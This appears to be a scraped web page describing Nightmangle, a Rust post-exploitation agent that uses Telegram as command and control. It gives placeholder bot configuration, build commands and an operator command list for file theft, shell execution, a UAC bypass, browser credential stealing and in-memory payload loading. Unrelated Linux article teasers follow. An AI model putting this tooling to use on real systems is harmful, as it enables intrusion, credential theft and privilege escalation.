Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent, created by @1N73LL1G3NC3.
It was developed as Proof of Concept (POC), that Telegram API can be used by threat actors for post-exploitation and to control their agents..
Nightmangle uses Telegram as a C2 server to communicate between the attacker and the client. However, it can only set one Telegram bot API per payload. This means that if you want to infect another machine, you need to build a new payload with a new Telegram bot API.
Please keep in mind that these Agent has been developed and shared for educational purposes only! Any misuse of this info will not be the responsibility of the author.
0123456789:XXXXxXXxxxXxX3x3x-3X-XxxxX3XXXXxx3X
.Bot::new("0123456789:XXXXxXXxxxXxX3x3x-3X-XxxxX3XXXXxx3X")
.9876543210
.ConfigParameters {bot_maintainer: UserId(9876543210)}
.$ rustup update nightly
$ rustup override set nightly
# Windows PowerShell
$ cargo build --release
Fully written in Rust
Help - Display help info. /help
ShowDir - Show content of specified directory. /showdir {dirname}
SendFile - Get specified file from victim. /sendfile {filepath}
Task - Execute specified shell commnd. /task cmd.exe /c {command}
Imperun - Impersonate and run (Token Duplication UAC Bypass) /imperun {list/exec} {pid} {cmd.exe /c whoami}
Screenshot - Take screenshot. /screenshot
St3al3r - Steal saved credentials from browsers (Firefox, Edge, Chromium, Chrome, Brave) /st3al3r
Coffee is a custom implementation of the original Cobalt Strike’s beacon_inline_execute. It supports most of the features of the Cobalt Strike compatibility layer, based on Coffee. To use these module, select BOF file with name ends with ‘.o’ like whoami.x64.o
to send.
Arguments for the BOF can be passed as caption to the message. Each argument must be prefixed with the type of the argument followed by a colon (:). The following types are supported:
str - A null-terminated string
wstr - A wide null-terminated string
int - A signed 32-bit integer
short - A signed 16-bit integer
Based on ClrOxide, it will load the CLR in the current process, resolve mscorlib, run your executable and return output back to the Telegram chat.
Imperun uses a token, stolen from an elevated process, to launch an elevated process of the attacker’s choosing, based on Impersonate-RS.
Just select file to send and add caption with destination directory, to the message.
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…
Managing user accounts is a core responsibility for any Linux administrator. Whether you’re securing a…
Linux offers powerful command-line tools for system administrators to view and manage user accounts. Knowing…